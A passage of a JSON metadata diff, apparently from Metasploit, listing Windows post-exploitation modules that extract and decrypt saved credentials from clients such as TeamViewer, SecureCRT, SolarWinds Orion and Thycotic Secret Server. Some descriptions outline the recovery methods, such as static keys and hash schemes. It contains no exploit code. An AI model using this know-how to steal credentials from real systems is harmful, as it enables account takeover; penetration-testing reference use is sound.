Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Postbox credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/postbox.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/postbox", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/pulse_secure": { + "name": "Windows Pulse Secure Connect Client Saved Password Extractor", + "fullname": "post/windows/gather/credentials/pulse_secure", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Quentin Kaiser " + ], + "description": "This module extracts and decrypts saved Pulse Secure Connect Client passwords from the\n Windows Registry. This module can only access credentials created by the user that the\n Meterpreter session is running as.\n Note that this module cannot link the password to a username unless the\n Meterpreter sessions is running as SYSTEM. 
This is because the username associated\n with a password is saved in 'C:\\ProgramData\\Pulse Secure\\ConnectionStore\\[SID].dat',\n which is only readable by SYSTEM.\n Note that for enterprise deployment, this username is almost always the domain\n username.", + "references": [ + "CVE-2020-8956", + "URL-https://qkaiser.github.io/reversing/2020/10/27/pule-secure-credentials", + "URL-https://www.gremwell.com/blog/reversing_pulse_secure_client_credentials_store", + "URL-https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/windows/gather/credentials/pulse_secure.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/pulse_secure", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/purevpn_cred_collector": { + "name": "Windows Gather PureVPN Client Credential Collector", + "fullname": "post/windows/gather/credentials/purevpn_cred_collector", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Manuel Nader #AgoraSecurity" + ], + "description": "Finds the password stored for the PureVPN Client.", + "references": [ + "URL-https://www.trustwave.com/Resources/SpiderLabs-Blog/Credential-Leak-Flaws-in-Windows-PureVPN-Client/", + "URL-https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2018-010/?fid=11779" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": 
"/modules/post/windows/gather/credentials/purevpn_cred_collector.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/purevpn_cred_collector", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/qq": { + "name": "QQ credential gatherer", + "fullname": "post/windows/gather/credentials/qq", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for QQ credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/qq.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/qq", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/quassel_irc": { + "name": "Quassel IRC credential gatherer", + "fullname": "post/windows/gather/credentials/quassel_irc", + "aliases": [], + "rank": 300, + 
"disclosure_date": null, + "type": "post", + "author": [ + "Jacob Tierney", + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored on Quassel IRC Client in a windows remote host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/quassel_irc.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/quassel_irc", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/razer_synapse": { + "name": "Windows Gather Razer Synapse Password Extraction", + "fullname": "post/windows/gather/credentials/razer_synapse", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Thomas McCarthy \"smilingraccoon\" ", + "Matt Howard \"pasv\" ", + "Brandon McCann \"zeknox\" " + ], + "description": "This module will enumerate passwords stored by the Razer Synapse\n client. The encryption key and iv is publicly known. This module\n will not only extract encrypted password but will also decrypt\n password using public key. 
Affects versions earlier than 1.7.15.", + "references": [ + "URL-http://www.pentestgeek.com/2013/01/16/hard-coded-encryption-keys-and-more-wordpress-fun/", + "URL-https://github.com/pasv/Testing/blob/master/Razer_decode.py" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/razer_synapse.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/razer_synapse", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/razorsql": { + "name": "Windows Gather RazorSQL Credentials", + "fullname": "post/windows/gather/credentials/razorsql", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Paul Rascagneres ", + "sinn3r " + ], + "description": "This module stores username, password, type, host, port, database (and name)\n collected from profiles.txt of RazorSQL.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/razorsql.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/razorsql", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/rdc_manager_creds": { + "name": "Windows Gather Remote Desktop Connection Manager Saved Password Extraction", + "fullname": 
"post/windows/gather/credentials/rdc_manager_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Tom Sellers " + ], + "description": "This module extracts and decrypts saved Microsoft Remote Desktop\n Connection Manager (RDCMan) passwords the .RDG files of users.\n The module will attempt to find the files configured for all users\n on the target system. Passwords for managed hosts are encrypted by\n default. In order for decryption of these passwords to be successful,\n this module must be executed under the same account as the user which\n originally encrypted the password. Passwords stored in plain text will\n be captured and documented.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/rdc_manager_creds.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/rdc_manager_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/redis_desktop_manager": { + "name": "RedisDesktopManager credential gatherer", + "fullname": "post/windows/gather/credentials/redis_desktop_manager", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kali-Team" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in 
the module documentation.\n This module searches for RedisDesktopManager credentials on a Windows host.", + "references": [ + "URL-https://blog.kali-team.cn/Metasploit-PackRat-RedisDesktopManager-42dc7ab063f040d182da0f1fc16db74e" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/redis_desktop_manager.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/redis_desktop_manager", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/safari": { + "name": "Safari credential gatherer", + "fullname": "post/windows/gather/credentials/safari", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. 
Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for safari credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/safari.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/safari", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/seamonkey": { + "name": "Seamonkey credential gatherer", + "fullname": "post/windows/gather/credentials/seamonkey", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. 
Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for seamonkey credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/seamonkey.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/seamonkey", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/securecrt": { + "name": "Windows SecureCRT Session Information Enumeration", + "fullname": "post/windows/gather/credentials/securecrt", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "HyperSine", + "Kali-Team " + ], + "description": "This module will determine if SecureCRT is installed on the target system and, if it is, it will try to\n dump all saved session information from the target. 
The passwords for these saved sessions will then be decrypted\n where possible, using the decryption information that HyperSine reverse engineered.\n\n Note that whilst SecureCRT has installers for Linux, Mac and Windows, this module presently only works on Windows.", + "references": [ + "URL-https://github.com/HyperSine/how-does-SecureCRT-encrypt-password/blob/master/doc/how-does-SecureCRT-encrypt-password.md" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/windows/gather/credentials/securecrt.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/securecrt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [], + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/skype": { + "name": "Windows Gather Skype Saved Password Hash Extraction", + "fullname": "post/windows/gather/credentials/skype", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "mubix ", + "hdm " + ], + "description": "This module finds saved login credentials\n for the Windows Skype client. The hash is in MD5 format\n that uses the username, a static string \"\\nskyper\\n\" and the\n password. 
The resulting MD5 is stored in the Config.xml file\n for the user after being XOR'd against a key generated by applying\n 2 SHA1 hashes of \"salt\" data which is stored in ProtectedStorage\n using the Windows API CryptProtectData against the MD5", + "references": [ + "URL-http://www.recon.cx/en/f/vskype-part2.pdf", + "URL-https://web.archive.org/web/20140207115406/http://insecurety.net/?p=427", + "URL-https://github.com/skypeopensource/tools" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/skype.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/skype", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/smartermail": { + "name": "Windows Gather SmarterMail Password Extraction", + "fullname": "post/windows/gather/credentials/smartermail", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Joe Giron", + "bcoles ", + "sinn3r " + ], + "description": "This module extracts and decrypts the sysadmin password in the\n SmarterMail 'mailConfig.xml' configuration file. 
The encryption\n key and IV are publicly known.\n\n This module has been tested successfully on SmarterMail versions\n 10.7.4842 and 11.7.5136.", + "references": [ + "URL-http://www.gironsec.com/blog/tag/cracking-smartermail/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/smartermail.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/smartermail", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/smartftp": { + "name": "Windows Gather SmartFTP Saved Password Extraction", + "fullname": "post/windows/gather/credentials/smartftp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module finds saved login credentials\n for the SmartFTP FTP client for windows.\n It finds the saved passwords and decrypts\n them.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/smartftp.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/smartftp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/solarwinds_orion_dump": { + "name": "SolarWinds Orion Secrets Dump", + "fullname": 
"post/windows/gather/credentials/solarwinds_orion_dump", + "aliases": [], + "rank": 0, + "disclosure_date": "2022-11-08", + "type": "post", + "author": [ + "npm ", + "Rob Fuller" + ], + "description": "This module exports and decrypts credentials from SolarWinds Orion Network\n Performance Monitor (NPM) to a CSV file; it is intended as a post-exploitation\n module for Windows hosts with SolarWinds Orion NPM installed. The module\n supports decryption of AES-256, RSA, and XMLSEC secrets. Separate actions for\n extraction and decryption of the data are provided to allow session migration\n during execution in order to log in to the SQL database using SSPI. Tested on\n the 2020 version of SolarWinds Orion NPM. This module is possible only because\n of the source code and technical information published by Rob Fuller and\n Atredis Partners.", + "references": [ + "URL-https://malicious.link/post/2020/solarflare-release-password-dumper-for-SolarWinds-orion/", + "URL-https://github.com/atredispartners/solarwinds-orion-cryptography" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/post/windows/gather/credentials/solarwinds_orion_dump.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/solarwinds_orion_dump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "Decrypt", + "description": "Decrypt SolarWinds Orion database export CSV file" + }, + { + "name": "Dump", + "description": "Export SolarWinds Orion database and perform decryption" + }, + { + "name": "Export", + "description": "Export SolarWinds Orion database without decryption" + } + ] + }, + 
"post_windows/gather/credentials/spark_im": { + "name": "Windows Gather Spark IM Password Extraction", + "fullname": "post/windows/gather/credentials/spark_im", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Brandon McCann \"zeknox\" ", + "Thomas McCarthy \"smilingraccoon\" " + ], + "description": "This module will enumerate passwords stored by the Spark IM client.\n The encryption key is publicly known. This module will not only extract encrypted\n password but will also decrypt password using public key.", + "references": [ + "URL-http://adamcaudill.com/2012/07/27/decrypting-spark-saved-passwords/" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/spark_im.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/spark_im", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/srware": { + "name": "Srware credential gatherer", + "fullname": "post/windows/gather/credentials/srware", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. 
Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Srware credentials on a Windows host. SRWare Iron is a Chromium-based web browser developed by the German company SRWare.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/srware.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/srware", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/sso": { + "name": "Windows Single Sign On Credential Collector (Mimikatz)", + "fullname": "post/windows/gather/credentials/sso", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Ben Campbell " + ], + "description": "This module will collect cleartext Single Sign On credentials from the Local\n Security Authority using the Kiwi (Mimikatz) extension. 
Blank passwords will not be stored\n in the database.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/sso.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/sso", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/steam": { + "name": "Windows Gather Steam Client Session Collector.", + "fullname": "post/windows/gather/credentials/steam", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Nikolai Rusakov " + ], + "description": "This module will collect Steam session information from an\n account set to autologin.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/steam.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/steam", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/sylpheed": { + "name": "Sylpheed email credential gatherer", + "fullname": "post/windows/gather/credentials/sylpheed", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jacob Tierney", + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. 
Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored on Sylpheed email client in a windows remote host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/sylpheed.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/sylpheed", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/tango": { + "name": "Tango credential gatherer", + "fullname": "post/windows/gather/credentials/tango", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Tango credentials on a Windows host. 
Tango is a third-party, cross platform messaging application software for smartphones developed by TangoME, Inc.t", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/tango.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/tango", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/teamviewer_passwords": { + "name": "Windows Gather TeamViewer Passwords", + "fullname": "post/windows/gather/credentials/teamviewer_passwords", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Nic Losby ", + "Kali-Team " + ], + "description": "This module will find and decrypt stored TeamViewer passwords", + "references": [ + "CVE-2019-18988", + "URL-https://whynotsecurity.com/blog/teamviewer/", + "URL-https://www.cnblogs.com/Kali-Team/p/12468066.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/teamviewer_passwords.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/teamviewer_passwords", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/thunderbird": { + "name": "Thunderbird credential gatherer", + "fullname": 
"post/windows/gather/credentials/thunderbird", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for thunderbird credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/thunderbird.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/thunderbird", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/thycotic_secretserver_dump": { + "name": "Delinea Thycotic Secret Server Dump", + "fullname": "post/windows/gather/credentials/thycotic_secretserver_dump", + "aliases": [], + "rank": 0, + "disclosure_date": "2022-08-15", + "type": "post", + "author": [ + "npm " + ], + "description": "This module exports and decrypts Secret Server credentials to a CSV file;\n it is intended as a post-exploitation module for Windows hosts with Delinea/Thycotic\n Secret Server installed. Master Encryption Key (MEK) and associated IV values are\n decrypted from encryption.config using a static key baked into the software. 
The\n module also supports parameter recovery for encryption configs configured with\n Windows DPAPI.", + "references": [ + "URL-https://github.com/denandz/SecretServerSecretStealer" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-09-29 13:58:54 +0000", + "path": "/modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/thycotic_secretserver_dump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "Dump", + "description": "Export Secret Server database and perform decryption" + }, + { + "name": "Export", + "description": "Export Secret Server database without decryption" + } + ] + }, + "post_windows/gather/credentials/tlen": { + "name": "Tlen credential gatherer", + "fullname": "post/windows/gather/credentials/tlen", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Tlen credentials on a Windows host. 
Tlen is a free Polish instant messaging service.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/tlen.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/tlen", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/tortoisesvn": { + "name": "Windows Gather TortoiseSVN Saved Password Extraction", + "fullname": "post/windows/gather/credentials/tortoisesvn", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Justin Cacak" + ], + "description": "This module extracts and decrypts saved TortoiseSVN passwords. 
